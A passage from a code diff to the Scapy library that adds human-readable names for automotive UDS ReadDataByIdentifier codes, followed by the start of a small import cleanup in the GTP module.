"Mechanik Version ME patch Level" +UDS_RDBI.dataIdentifiers[0xf153] = "Boot Software Version" +UDS_RDBI.dataIdentifiers[0xf154] = "HardwareSupplier Read" +UDS_RDBI.dataIdentifiers[0xf155] = "SoftwareSupplier Read" +UDS_RDBI.dataIdentifiers[0xf156] = "Layered Network Information Baud Rate" +UDS_RDBI.dataIdentifiers[0xf158] = "Vehicle Information Body Style" +UDS_RDBI.dataIdentifiers[0xf159] = "TCU Model Type HW Connection Capability" +UDS_RDBI.dataIdentifiers[0xf15a] = "Fingerprint History Code" +UDS_RDBI.dataIdentifiers[0xf15b] = "Read Fingerprint" +UDS_RDBI.dataIdentifiers[0xf160] = "Software Module Information Communication Matrix Last Channel LSB" +UDS_RDBI.dataIdentifiers[0xf161] = "Software Module Information PT CAN" +UDS_RDBI.dataIdentifiers[0xf162] = "Software Module Information PT Sensor CAN" +UDS_RDBI.dataIdentifiers[0xf163] = "Software Module Information Hybrid CAN" +UDS_RDBI.dataIdentifiers[0xf164] = "Software Module Information FlexRay" +UDS_RDBI.dataIdentifiers[0xf170] = "CAN Phys Layer Info Chassis CAN" +UDS_RDBI.dataIdentifiers[0xf171] = "CAN Phys Layer Info PT CAN" +UDS_RDBI.dataIdentifiers[0xf172] = "CAN Phys Layer Info PT Sensor CAN" +UDS_RDBI.dataIdentifiers[0xf173] = "CAN Phys Layer Info Hybrid CAN" +UDS_RDBI.dataIdentifiers[0xf174] = "CAN Phys Layer Info 4 Baud Rate 0 Last Channel BTR0 Channel 4" +UDS_RDBI.dataIdentifiers[0xf182] = "Calibration number" +UDS_RDBI.dataIdentifiers[0xf188] = "VehicleManufacturerECUSoftwareNumber Ref C" +UDS_RDBI.dataIdentifiers[0xf18c] = "ECU Serial Number" +UDS_RDBI.dataIdentifiers[0xf190] = "VIN Original" +UDS_RDBI.dataIdentifiers[0xf194] = "systemSupplierECUSoftwareNumber" +UDS_RDBI.dataIdentifiers[0xf195] = "systemSupplierECUSoftwareVersionNumber", +UDS_RDBI.dataIdentifiers[0xf196] = "ExhaustRegulationorTypeApprovalNumber" +UDS_RDBI.dataIdentifiers[0xf197] = "SystemNameorEngineType" # or System Supplier SBOOT Software Version Number +UDS_RDBI.dataIdentifiers[0xf198] = "System Supplier CBOOT Software Version Number" +UDS_RDBI.dataIdentifiers[0xf199] = "System Supplier CAL DATA Software Version Number" +UDS_RDBI.dataIdentifiers[0xf1a0] = "VIN Aktuell VIN" +UDS_RDBI.dataIdentifiers[0xf1a6] = "FlexRay Node Information" +UDS_RDBI.dataIdentifiers[0xf1b0] = "Nummernblock Lieferant" +UDS_RDBI.dataIdentifiers[0xf1c0] = "F1C1 F1E0" +UDS_RDBI.dataIdentifiers[0xf1f0] = "BPCM Controller Hardware DCX" +UDS_RDBI.dataIdentifiers[0xf1f1] = "BPCM Controller Hardware Version DCX" +UDS_RDBI.dataIdentifiers[0xf1f5] = "System Identification - Barcode" +UDS_RDBI.dataIdentifiers[0xf1ff] = "Mercedes Serial Number" +UDS_RDBI.dataIdentifiers[0xf252] = "Temprature Counter Erase" +UDS_RDBI.dataIdentifiers[0xf300] = "Dynamically Define Identifier by Identifier F300" +UDS_RDBI.dataIdentifiers[0xf301] = "HwAcc SST O Read IO Control" +UDS_RDBI.dataIdentifiers[0xf303] = "HwAcc SST I" +UDS_RDBI.dataIdentifiers[0xf310] = "HwAcc DIAG O Read IO Control" +UDS_RDBI.dataIdentifiers[0xf311] = "HwAcc SYS O Read IO Control" +UDS_RDBI.dataIdentifiers[0xf312] = "HwAcc DIAG I" +UDS_RDBI.dataIdentifiers[0xf313] = "HwAcc SYS I" +UDS_RDBI.dataIdentifiers[0xf318] = "HwAcc HSD O Read IO Control" +UDS_RDBI.dataIdentifiers[0xf31a] = "HwAcc HSD I" +UDS_RDBI.dataIdentifiers[0xf320] = "HwAcc SBC I" +UDS_RDBI.dataIdentifiers[0xf321] = "HwAcc SBC O Read IO Control" +UDS_RDBI.dataIdentifiers[0xf3b0] = "Read SW Varianten Information Erwartete Variante" +UDS_RDBI.dataIdentifiers[0xf3b1] = "Read Version LF ASIC SD408 SW Version High Nibble im Flash" +UDS_RDBI.dataIdentifiers[0xf400] = "F401 F420" # or Flash Verriegelung +UDS_RDBI.dataIdentifiers[0xf401] = "PID F401" +UDS_RDBI.dataIdentifiers[0xf403] = "system status" +UDS_RDBI.dataIdentifiers[0xf404] = "Calculated LOAD value" +UDS_RDBI.dataIdentifiers[0xf405] = "Engine coolant temperature" +UDS_RDBI.dataIdentifiers[0xf406] = "SHORT TERM FUEL TRIM" +UDS_RDBI.dataIdentifiers[0xf407] = "Long Term Fuel Trim" +UDS_RDBI.dataIdentifiers[0xf40a] = "Pressure Gauge" +UDS_RDBI.dataIdentifiers[0xf40b] = "Raw manifold pressure from sensor" +UDS_RDBI.dataIdentifiers[0xf40c] = "Engine RPM" +UDS_RDBI.dataIdentifiers[0xf40d] = "Vehicle speed sensor OBD F40D" +UDS_RDBI.dataIdentifiers[0xf40e] = "Ignition timing advance for cylinder 1 OBD F40E" +UDS_RDBI.dataIdentifiers[0xf40f] = "Raw manifold air temperature sensor" +UDS_RDBI.dataIdentifiers[0xf410] = "Air flow rate from mass air flow sensor OBD F410" +UDS_RDBI.dataIdentifiers[0xf411] = "Absolute throttle position" +UDS_RDBI.dataIdentifiers[0xf413] = "Location of oxygen sensors" +UDS_RDBI.dataIdentifiers[0xf414] = "Bank 1 Sensor" +UDS_RDBI.dataIdentifiers[0xf415] = "Oxygen downstream sensor output voltage" +UDS_RDBI.dataIdentifiers[0xf41c] = "OBD requirements to wich vehicle is designed OBD F41C" +UDS_RDBI.dataIdentifiers[0xf41e] = "Auxiliary Input" +UDS_RDBI.dataIdentifiers[0xf41f] = "Time Since Engine Start" +UDS_RDBI.dataIdentifiers[0xf420] = "F421 F440" +UDS_RDBI.dataIdentifiers[0xf421] = "Distance travelled while MIL is activated" +UDS_RDBI.dataIdentifiers[0xf422] = "Pressure relative to manifold vacuum" +UDS_RDBI.dataIdentifiers[0xf423] = "rail pressure" +UDS_RDBI.dataIdentifiers[0xf424] = "Oxygen sensor monitoring Sensor" +UDS_RDBI.dataIdentifiers[0xf425] = "Oxygen sensor monitoring Sensor" +UDS_RDBI.dataIdentifiers[0xf426] = "Oxygen sensor heater monitoring" +UDS_RDBI.dataIdentifiers[0xf42c] = "Commanded EGR" +UDS_RDBI.dataIdentifiers[0xf42d] = "EGR Error" +UDS_RDBI.dataIdentifiers[0xf42e] = "Commanded Evaporative Purge" +UDS_RDBI.dataIdentifiers[0xf42f] = "Level Input" +UDS_RDBI.dataIdentifiers[0xf430] = "Number of warm ups since diagnostic trouble codes cleared OBD F430" +UDS_RDBI.dataIdentifiers[0xf431] = "Distance travelled since diagnostic trouble codes cleared" +UDS_RDBI.dataIdentifiers[0xf432] = "Raw Tank differential pressure" +UDS_RDBI.dataIdentifiers[0xf433] = "Barometric Pressure" +UDS_RDBI.dataIdentifiers[0xf43c] = "Catalyst Temperature Bank 1 Sensor" +UDS_RDBI.dataIdentifiers[0xf43d] = "Catalyst Temperature Bank 2 Sensor" +UDS_RDBI.dataIdentifiers[0xf43e] = "Catalyst Temperature Bank 1 Sensor" +UDS_RDBI.dataIdentifiers[0xf43f] = "Catalyst Temperature Bank 2 Sensor" +UDS_RDBI.dataIdentifiers[0xf440] = "F441 F460" +UDS_RDBI.dataIdentifiers[0xf441] = "PID F441" +UDS_RDBI.dataIdentifiers[0xf442] = "Control module voltage" +UDS_RDBI.dataIdentifiers[0xf443] = "Absolute Load Value" +UDS_RDBI.dataIdentifiers[0xf444] = "Air Commanded Equivalence Ratio" +UDS_RDBI.dataIdentifiers[0xf445] = "Relative Throttle Position" +UDS_RDBI.dataIdentifiers[0xf446] = "Ambient air temperature" +UDS_RDBI.dataIdentifiers[0xf447] = "Absolute Throttle Position B" +UDS_RDBI.dataIdentifiers[0xf448] = "Absolute Throttle Position C" +UDS_RDBI.dataIdentifiers[0xf449] = "Accelerator Pedal Position D" +UDS_RDBI.dataIdentifiers[0xf44a] = "Accelerator Pedal Position E" +UDS_RDBI.dataIdentifiers[0xf44b] = "Accelerator Pedal Position F" +UDS_RDBI.dataIdentifiers[0xf44c] = "Commanded Throttle Actuator Control" +UDS_RDBI.dataIdentifiers[0xf44e] = "Engine run time since DTCs cleared" +UDS_RDBI.dataIdentifiers[0xf44f] = "Maximum value for Intake Manifold Absolute Pressure" +UDS_RDBI.dataIdentifiers[0xf453] = "Absolute Evap System Vapor Pressure" +UDS_RDBI.dataIdentifiers[0xf454] = "Evap System Vapor Pressure" +UDS_RDBI.dataIdentifiers[0xf45c] = "Engine Oil Temperature" +UDS_RDBI.dataIdentifiers[0xf45d] = "Injection Timing" +UDS_RDBI.dataIdentifiers[0xf45e] = "Engine Fuel Rate" +UDS_RDBI.dataIdentifiers[0xf460] = "F461 F480" +UDS_RDBI.dataIdentifiers[0xf461] = "Driver s Demand Engine Percent Torque" +UDS_RDBI.dataIdentifiers[0xf462] = "Actual Engine Percent Torque" +UDS_RDBI.dataIdentifiers[0xf463] = "Engine Reference Torque" +UDS_RDBI.dataIdentifiers[0xf464] = "Engine Percent Torque At Point" +UDS_RDBI.dataIdentifiers[0xf469] = "Commanded EGR and EGR Error" +UDS_RDBI.dataIdentifiers[0xf46a] = "Commanded Diesel Intake Air Flow Control and Relative Intake Air Flow Position" +UDS_RDBI.dataIdentifiers[0xf46b] = "Exhaust Gas Recirculation Temperature" +UDS_RDBI.dataIdentifiers[0xf46d] = "Pressure Control System" +UDS_RDBI.dataIdentifiers[0xf470] = "Boost Pressure Control" +UDS_RDBI.dataIdentifiers[0xf473] = "Exhaust Pressure" +UDS_RDBI.dataIdentifiers[0xf475] = "Turbocharger A Temperature" +UDS_RDBI.dataIdentifiers[0xf477] = "Charge Air Cooler Temperature CACT" +UDS_RDBI.dataIdentifiers[0xf47a] = "Diesel Particulate Filter DPF Bank" +UDS_RDBI.dataIdentifiers[0xf47c] = "Diesel Particulate Filter DPF Temperature" +UDS_RDBI.dataIdentifiers[0xf480] = "F481 F4A0" +UDS_RDBI.dataIdentifiers[0xf488] = "SCR Inducement System" +UDS_RDBI.dataIdentifiers[0xf48b] = "Diesel Aftertreatment" +UDS_RDBI.dataIdentifiers[0xf48c] = "Sensor Wide Range" +UDS_RDBI.dataIdentifiers[0xf490] = "WWH OBD Vehicle OBD System information" +UDS_RDBI.dataIdentifiers[0xf491] = "WWH OBD ECU OBD System Information" +UDS_RDBI.dataIdentifiers[0xf493] = "WWH OBD Vehicle counters supported" +UDS_RDBI.dataIdentifiers[0xf494] = "NOx control driver inducement system status" +UDS_RDBI.dataIdentifiers[0xf600] = "F600 F620" +UDS_RDBI.dataIdentifiers[0xf601] = "OBDMID Oxygen sensor diagnostic for service 06 OBD F601" +UDS_RDBI.dataIdentifiers[0xf602] = "06 Upstream Oxygen sensor diagnostic" +UDS_RDBI.dataIdentifiers[0xf620] = "F621 F640" +UDS_RDBI.dataIdentifiers[0xf621] = "06 Catalyst diagnostic" +UDS_RDBI.dataIdentifiers[0xf631] = "DC motor valve" +UDS_RDBI.dataIdentifiers[0xf635] = "06 VVT Diagnostic" +UDS_RDBI.dataIdentifiers[0xf639] = "OBDMID Evaporation monitoring fuel cap misssing" +UDS_RDBI.dataIdentifiers[0xf63a] = "OBDMID Evaporation monitoring large leak diagnostic" +UDS_RDBI.dataIdentifiers[0xf63b] = "OBDMID Evaporation monitoring 1mm leak diagnostic" +UDS_RDBI.dataIdentifiers[0xf640] = "F641 F660" +UDS_RDBI.dataIdentifiers[0xf641] = "Downstream oxygen sensor heater monitoring" +UDS_RDBI.dataIdentifiers[0xf642] = "Upstream oxygen sensor heater monitoring" +UDS_RDBI.dataIdentifiers[0xf660] = "F661 F680" +UDS_RDBI.dataIdentifiers[0xf680] = "F681 F6A0" +UDS_RDBI.dataIdentifiers[0xf681] = "system diagnostic" +UDS_RDBI.dataIdentifiers[0xf685] = "Turbocharger Monitor diagnostic" +UDS_RDBI.dataIdentifiers[0xf6a0] = "F6A1 F6C0" +UDS_RDBI.dataIdentifiers[0xf6a1] = "OBDMID Misfire diagnostic" +UDS_RDBI.dataIdentifiers[0xf6b2] = "Diesel Particulate Filter Diagnostic" +UDS_RDBI.dataIdentifiers[0xf6c0] = "F6C1 F6E0" +UDS_RDBI.dataIdentifiers[0xf6e0] = "F6E1 F6FF" +UDS_RDBI.dataIdentifiers[0xf6e3] = "EGR Low Pressure System Diagnostic" +UDS_RDBI.dataIdentifiers[0xf6e4] = "Turbocharger Monitor Bank1" +UDS_RDBI.dataIdentifiers[0xf6e5] = "Engine Cooling Temperature Monitoring" +UDS_RDBI.dataIdentifiers[0xf6e8] = "06 Evaporation diagnosis" +UDS_RDBI.dataIdentifiers[0xf800] = "F801 F820" +UDS_RDBI.dataIdentifiers[0xf802] = "OBDMID Vehicle identification number" +UDS_RDBI.dataIdentifiers[0xf804] = "OBD CALIDs" +UDS_RDBI.dataIdentifiers[0xf805] = "ZBS Number" +UDS_RDBI.dataIdentifiers[0xf806] = "Calibration verification numbers" +UDS_RDBI.dataIdentifiers[0xf808] = "In Use Monitor Performance Ratio" # or HEX Gasoline, IUPR gasoline +UDS_RDBI.dataIdentifiers[0xf80a] = "09 systemNameorEngineType" +UDS_RDBI.dataIdentifiers[0xf80b] = "IUPR diesel" # or HEX Diesel +UDS_RDBI.dataIdentifiers[0xf80f] = "09 exhaustRegulationorTypeApprovalNumber" +UDS_RDBI.dataIdentifiers[0xf810] = "09 PROTOCOL IDENTIFICATION" +UDS_RDBI.dataIdentifiers[0xf811] = "09 WWH OBD GTR NUMBER" +UDS_RDBI.dataIdentifiers[0xf813] = "Certification Test Group Engine Family Number CTGEFN" +UDS_RDBI.dataIdentifiers[0xfb04] = "CAL-ID" +UDS_RDBI.dataIdentifiers[0xfd00] = "Implicit Variant Coding Read Car Type STRUCTURE Car with Ethanolsensor" +UDS_RDBI.dataIdentifiers[0xfd01] = "UH Minimum Module Voltage" # or Engine speed 1 Read Engine speed +UDS_RDBI.dataIdentifiers[0xfd02] = "PM" # or UH Lifetime Minimum OCV +UDS_RDBI.dataIdentifiers[0xfd03] = "UH Coolant Inlet Temperature" # or SBW Infos +UDS_RDBI.dataIdentifiers[0xfd04] = "Temperaturspeicher Leiterplatte loeschen" # or Temperatur Leiterplatte, Total-Kodierung, injection cut off +UDS_RDBI.dataIdentifiers[0xfd05] = "UH Module Coolant Delta" # or Terminal 15 status after debouncing +UDS_RDBI.dataIdentifiers[0xfd06] = "Widerstandswerte Hebelgeber Hebelgeber Links" # or UH Total Time Contactors Closed, Widerstandswerte Hebelgeber, system ECU sub state +UDS_RDBI.dataIdentifiers[0xfd07] = "State of synchronisation" # or RBM Festsitzerkennung Hebelgeber Denominator, UH Total Time of Operation, Festsitzerkennung Hebelgeber +UDS_RDBI.dataIdentifiers[0xfd08] = "Diagnosis power stage entry conditions fulfilled" # or UH Isolation Fault Diagnostic +UDS_RDBI.dataIdentifiers[0xfd09] = "cut off" +UDS_RDBI.dataIdentifiers[0xfd0a] = "Condition end of start" +UDS_RDBI.dataIdentifiers[0xfd0b] = "Opening angle set point TDC angle reference" +UDS_RDBI.dataIdentifiers[0xfd0c] = "Injection abortion counter" +UDS_RDBI.dataIdentifiers[0xfd0d] = "Dwell time" +UDS_RDBI.dataIdentifiers[0xfd0e] = "Applied ignition angle" +UDS_RDBI.dataIdentifiers[0xfd0f] = "Condition for active ignition circuit diagnosis" +UDS_RDBI.dataIdentifiers[0xfd10] = "Ignition powerstage error flag byte" +UDS_RDBI.dataIdentifiers[0xfd11] = "Flagbyte SPI error" +UDS_RDBI.dataIdentifiers[0xfd12] = "Flagword for stimulated ignition misfires" +UDS_RDBI.dataIdentifiers[0xfd13] = "Engine state" +UDS_RDBI.dataIdentifiers[0xfd14] = "State of crankshaft signal evaluation" +UDS_RDBI.dataIdentifiers[0xfd15] = "Starter status" +UDS_RDBI.dataIdentifiers[0xfd16] = "state of error wrong crankshaft signal" +UDS_RDBI.dataIdentifiers[0xfd17] = "Reason of cranksahft error" +UDS_RDBI.dataIdentifiers[0xfd18] = "State of camshaft position" +UDS_RDBI.dataIdentifiers[0xfd19] = "State of the camshaft diagnosis" +UDS_RDBI.dataIdentifiers[0xfd1a] = "voltage" +UDS_RDBI.dataIdentifiers[0xfd1b] = "Dew point" +UDS_RDBI.dataIdentifiers[0xfd1c] = "Bit heating on HEGO sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd1d] = "Internal resistance HEGO sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd1e] = "Signal acquisition of HEGO sensor 1 bank 1 Bit measurement of internal resistance enabled" +UDS_RDBI.dataIdentifiers[0xfd1f] = "Bit heating on HEGO sensor 2 bank" +UDS_RDBI.dataIdentifiers[0xfd20] = "FD21 FD40" # or Cobasys UH Security Access +UDS_RDBI.dataIdentifiers[0xfd21] = "Internal resistance HEGO sensor 2 bank" # or Cobasys Reset Usage History +UDS_RDBI.dataIdentifiers[0xfd22] = "Signal acquisition of HEGO sensor 2 bank 1 Bit measurement of internal resistance enabled" +UDS_RDBI.dataIdentifiers[0xfd23] = "Cycle flag for diagnosis LSU sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd24] = "Ceramics temperature sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd25] = "LSU temperature valid sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd26] = "CJ135 Electrical diagnosis allowed" +UDS_RDBI.dataIdentifiers[0xfd27] = "Lambda actual value" +UDS_RDBI.dataIdentifiers[0xfd28] = "LSU Signal quality" +UDS_RDBI.dataIdentifiers[0xfd29] = "LSU Pump current" +UDS_RDBI.dataIdentifiers[0xfd2a] = "Signal quality for internal LSU temperature" +UDS_RDBI.dataIdentifiers[0xfd2b] = "Knock sensor diagnosis active lower threshold" +UDS_RDBI.dataIdentifiers[0xfd2c] = "KS diagnosis current value lower threshold UDKSV6UN" +UDS_RDBI.dataIdentifiers[0xfd2d] = "Reference level knock control" +UDS_RDBI.dataIdentifiers[0xfd2e] = "Knock amplification factor" +UDS_RDBI.dataIdentifiers[0xfd2f] = "Air charge load" +UDS_RDBI.dataIdentifiers[0xfd30] = "PSP request" # or Cobasys UH Amp Hrs In +UDS_RDBI.dataIdentifiers[0xfd31] = "PSP powerstage command" # or Cobasys UH Amp Hrs Out +UDS_RDBI.dataIdentifiers[0xfd32] = "Cobasys UH Last Abuse Cond" # or Manifold pressure sensor voltage +UDS_RDBI.dataIdentifiers[0xfd33] = "Cobasys Activate Service CAN" # or Boost pressure sensor voltage +UDS_RDBI.dataIdentifiers[0xfd34] = "Manifold air temperature sensor voltage" +UDS_RDBI.dataIdentifiers[0xfd35] = "Temperature Upstream Throttle voltage" +UDS_RDBI.dataIdentifiers[0xfd36] = "Throttle valve sensor feedback 1 voltage" +UDS_RDBI.dataIdentifiers[0xfd37] = "Throttle valve sensor feedback 2 voltage" +UDS_RDBI.dataIdentifiers[0xfd38] = "H Bridge throttle command" +UDS_RDBI.dataIdentifiers[0xfd39] = "H Bridge throttle inhibition" +UDS_RDBI.dataIdentifiers[0xfd3a] = "Pop off command" +UDS_RDBI.dataIdentifiers[0xfd3b] = "VVT Intake powerstage command" +UDS_RDBI.dataIdentifiers[0xfd3c] = "Waste gate powerstage command" +UDS_RDBI.dataIdentifiers[0xfd3d] = "Engine temperature voltage" +UDS_RDBI.dataIdentifiers[0xfd3e] = "Engine temperature" +UDS_RDBI.dataIdentifiers[0xfd3f] = "FanDIO 0 powerstage command" +UDS_RDBI.dataIdentifiers[0xfd40] = "FD41 FD60" +UDS_RDBI.dataIdentifiers[0xfd41] = "FanDIO 1 powerstage command" +UDS_RDBI.dataIdentifiers[0xfd42] = "CThmst2 powerstage command" +UDS_RDBI.dataIdentifiers[0xfd43] = "FAN powerstage command" +UDS_RDBI.dataIdentifiers[0xfd44] = "CThmst powerstage command" +UDS_RDBI.dataIdentifiers[0xfd45] = "OilPCtl powerstage command" +UDS_RDBI.dataIdentifiers[0xfd46] = "DPTC powerstage command" +UDS_RDBI.dataIdentifiers[0xfd47] = "ACCOM powerstage command" +UDS_RDBI.dataIdentifiers[0xfd48] = "CPURGEV powerstage command" +UDS_RDBI.dataIdentifiers[0xfd49] = "Shtr powerstage command" +UDS_RDBI.dataIdentifiers[0xfd4a] = "Raw load on the Alternator" +UDS_RDBI.dataIdentifiers[0xfd4b] = "Accelerator pedal brute value sensor 1 without limitations" +UDS_RDBI.dataIdentifiers[0xfd4d] = "Gas pedal value sensor" +UDS_RDBI.dataIdentifiers[0xfd4e] = "WG position voltage" +UDS_RDBI.dataIdentifiers[0xfd4f] = "Brake switch raw value" +UDS_RDBI.dataIdentifiers[0xfd50] = "AC switch raw value" +UDS_RDBI.dataIdentifiers[0xfd51] = "Cruise control and speed limiter steering wheel push buttons raw value" +UDS_RDBI.dataIdentifiers[0xfd52] = "Input of the cruise control main switch raw value" +UDS_RDBI.dataIdentifiers[0xfd53] = "Speed limiter main switch raw value" +UDS_RDBI.dataIdentifiers[0xfd54] = "Clutch raw value" +UDS_RDBI.dataIdentifiers[0xfd55] = "State of the begin high of the clutch pedal raw value" +UDS_RDBI.dataIdentifiers[0xfd56] = "CAC powerstage command" +UDS_RDBI.dataIdentifiers[0xfd57] = "H Bridge Waste Gate direction information" +UDS_RDBI.dataIdentifiers[0xfd58] = "H Bridge Waste Gate command" +UDS_RDBI.dataIdentifiers[0xfd59] = "Reset ID of the last reset reason" +UDS_RDBI.dataIdentifiers[0xfd5a] = "Dynamically switched environmental condition messages depending on error reaction" +UDS_RDBI.dataIdentifiers[0xfd5b] = "Dynamically switched environmental condition messages depending on error reaction" +UDS_RDBI.dataIdentifiers[0xfd5c] = "Dynamically switched environmental condition messages depending on error reaction" +UDS_RDBI.dataIdentifiers[0xfd5d] = "Dynamically switched environmental condition messages depending on error reaction 4" +UDS_RDBI.dataIdentifiers[0xfd5e] = "Output voltage of HEGO sensor 1 bank 1 extended range" +UDS_RDBI.dataIdentifiers[0xfd5f] = "Output voltage of HEGO sensor 2 bank 1 extended range" +UDS_RDBI.dataIdentifiers[0xfd60] = "FD61 FD80" +UDS_RDBI.dataIdentifiers[0xfd61] = "Bit internal resistance is valid HEGO sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd62] = "Bit internal resistance is valid HEGO sensor 2 bank" +UDS_RDBI.dataIdentifiers[0xfd64] = "Vacuum pump command" +UDS_RDBI.dataIdentifiers[0xfd65] = "Vacumm pressure sensor value" +UDS_RDBI.dataIdentifiers[0xfd66] = "Condition for knocking Knocking event detected" +UDS_RDBI.dataIdentifiers[0xfd67] = "Condition for knock control active" +UDS_RDBI.dataIdentifiers[0xfd68] = "integrator value with offset correction Instantaneous knock noise for each cylinder 0" +UDS_RDBI.dataIdentifiers[0xfd69] = "integrator value with offset correction Instantaneous knock noise for each cylinder" +UDS_RDBI.dataIdentifiers[0xfd6a] = "integrator value with offset correction Instantaneous knock noise for each cylinder" +UDS_RDBI.dataIdentifiers[0xfd6b] = "measured Ip raw value sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd6c] = "measured CJ135 Mode sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd6d] = "probable CJ135 Mode sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd6e] = "Duty cycle control powerstage heater sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd6f] = "Lambda signal quality sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd70] = "effective heater voltage reqested by heater control from heater power stage control sensor 1 bank" +UDS_RDBI.dataIdentifiers[0xfd71] = "cylinder counter of knock control" +UDS_RDBI.dataIdentifiers[0xfd72] = "Knock amplification factor 0" +UDS_RDBI.dataIdentifiers[0xfd73] = "Knock amplification factor" +UDS_RDBI.dataIdentifiers[0xfd74] = "Knock amplification factor" +UDS_RDBI.dataIdentifiers[0xfd75] = "Normalized reference level of knock control" +UDS_RDBI.dataIdentifiers[0xfd76] = "Normalized reference level of knock control" +UDS_RDBI.dataIdentifiers[0xfd77] = "Normalized reference level of knock control" +UDS_RDBI.dataIdentifiers[0xfd78] = "normalized reference level of knock control" +UDS_RDBI.dataIdentifiers[0xfd79] = "Effective injection time" +UDS_RDBI.dataIdentifiers[0xfd7a] = "Effective injection time for cylinder" +UDS_RDBI.dataIdentifiers[0xfd7b] = "Effective injection time for cylinder 4" +UDS_RDBI.dataIdentifiers[0xfd7c] = "Applied ignition angle for cylinder" +UDS_RDBI.dataIdentifiers[0xfd7d] = "Applied ignition angle for cylinder" +UDS_RDBI.dataIdentifiers[0xfd7e] = "Applied ignition angle for cylinder 4" +UDS_RDBI.dataIdentifiers[0xfd7f] = "Knock amplification factor" +UDS_RDBI.dataIdentifiers[0xfd80] = "Effective injection time" +UDS_RDBI.dataIdentifiers[0xfd81] = "Effective injection time" +UDS_RDBI.dataIdentifiers[0xfd82] = "Applied ignition angle" +UDS_RDBI.dataIdentifiers[0xfd83] = "Applied ignition angle" +UDS_RDBI.dataIdentifiers[0xfd84] = "Applied ignition angle" +UDS_RDBI.dataIdentifiers[0xfdd2] = "ROE Variant" +UDS_RDBI.dataIdentifiers[0xfe00] = "ISFTFiltVC" +UDS_RDBI.dataIdentifiers[0xfe01] = "HwAcc SST O" +UDS_RDBI.dataIdentifiers[0xfe02] = "BTCIIBSNormal" +UDS_RDBI.dataIdentifiers[0xfe03] = "START STOP" +UDS_RDBI.dataIdentifiers[0xfe04] = "BTCCIC" +UDS_RDBI.dataIdentifiers[0xfe05] = "BTCCShunt" +UDS_RDBI.dataIdentifiers[0xfe06] = "BTCCBattery" +UDS_RDBI.dataIdentifiers[0xfe07] = "BTCRShunt" +UDS_RDBI.dataIdentifiers[0xfe08] = "BTCTauIS" +UDS_RDBI.dataIdentifiers[0xfe09] = "BTCTauIA" +UDS_RDBI.dataIdentifiers[0xfe10] = "POWER SUPPLY AND BATTERY SWITCH IO" +UDS_RDBI.dataIdentifiers[0xfe11] = "HwAcc SYS O" +UDS_RDBI.dataIdentifiers[0xfe12] = "POWER SUPPLY AND BATTERY SWITCH" +UDS_RDBI.dataIdentifiers[0xfe13] = "BTCTauBA" +UDS_RDBI.dataIdentifiers[0xfe14] = "OB PowerSupply Switching STUETZKONZEPT IO" +UDS_RDBI.dataIdentifiers[0xfe15] = "OB PowerSupply Switching STUETZKONZEPT" +UDS_RDBI.dataIdentifiers[0xfe16] = "WURQuiesActvLmt" +UDS_RDBI.dataIdentifiers[0xfe17] = "WURVoltLmt" +UDS_RDBI.dataIdentifiers[0xfe18] = "SHIFT BY WIRE IO" +UDS_RDBI.dataIdentifiers[0xfe19] = "SHIFT BY WIRE" +UDS_RDBI.dataIdentifiers[0xfe1a] = "Door Contacts" +UDS_RDBI.dataIdentifiers[0xfe1b] = "Door Contacts IO" +UDS_RDBI.dataIdentifiers[0xfe20] = "SBC LIN" +UDS_RDBI.dataIdentifiers[0xfe21] = "SBC LIN IO" +UDS_RDBI.dataIdentifiers[0xfe22] = "CAN Interfaces IO" +UDS_RDBI.dataIdentifiers[0xfe23] = "BTS" +UDS_RDBI.dataIdentifiers[0xfe24] = "BTS IO" +UDS_RDBI.dataIdentifiers[0xfe25] = "LADESCHALTUNG Charging Circuit IO" +UDS_RDBI.dataIdentifiers[0xfe26] = "LADESCHALTUNG Charging Circuit" +UDS_RDBI.dataIdentifiers[0xfe27] = "TAG3 LIN HFA LIN BLE IO" +UDS_RDBI.dataIdentifiers[0xfe28] = "Ethernet IO" +UDS_RDBI.dataIdentifiers[0xfe29] = "Ethernet" +UDS_RDBI.dataIdentifiers[0xfe2a] = "DRCIGradient3" +UDS_RDBI.dataIdentifiers[0xfe2b] = "DRCIGradient4" +UDS_RDBI.dataIdentifiers[0xfe2c] = "DRCIGradient5" +UDS_RDBI.dataIdentifiers[0xfe2d] = "DRCTClass1" +UDS_RDBI.dataIdentifiers[0xfe2e] = "DRCTClass2" +UDS_RDBI.dataIdentifiers[0xfe2f] = "DRCTClass3" +UDS_RDBI.dataIdentifiers[0xfe30] = " 100Base Tx IO" +UDS_RDBI.dataIdentifiers[0xfe31] = "Broadr Reach IO" +UDS_RDBI.dataIdentifiers[0xfe32] = "DRCIClass3" +UDS_RDBI.dataIdentifiers[0xfe33] = "DRCIClass4" +UDS_RDBI.dataIdentifiers[0xfe34] = "DRCIClass5" +UDS_RDBI.dataIdentifiers[0xfe35] = "DRCRStepMax" +UDS_RDBI.dataIdentifiers[0xfe36] = "DRCFilterLow" +UDS_RDBI.dataIdentifiers[0xfe37] = "DRCFilterHigh" +UDS_RDBI.dataIdentifiers[0xfe38] = "ISFTM" +UDS_RDBI.dataIdentifiers[0xfe50] = "OMCMaxTransTime" +UDS_RDBI.dataIdentifiers[0xfee0] = "FEE1 FEFF" +UDS_RDBI.dataIdentifiers[0xfee5] = "Dummy message configuration for Ignition control tester request" +UDS_RDBI.dataIdentifiers[0xfee9] = "Dummy message configuration for Injection control tester request" +UDS_RDBI.dataIdentifiers[0xfeff] = "Supplier component reset" +UDS_RDBI.dataIdentifiers[0xff61] = "FIMs" +UDS_RDBI.dataIdentifiers[0xff62] = "inverter signals" diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 9ceff24fe7c..a0f66136fc2 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -13,7 +13,7 @@ import struct -from scapy.compat import chb, orb, bytes_encode +from scapy.compat import chb, orb from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, FieldLenField, FieldListField, FlagsField, IntField, \ @@ -167,22 +167,18 @@ def 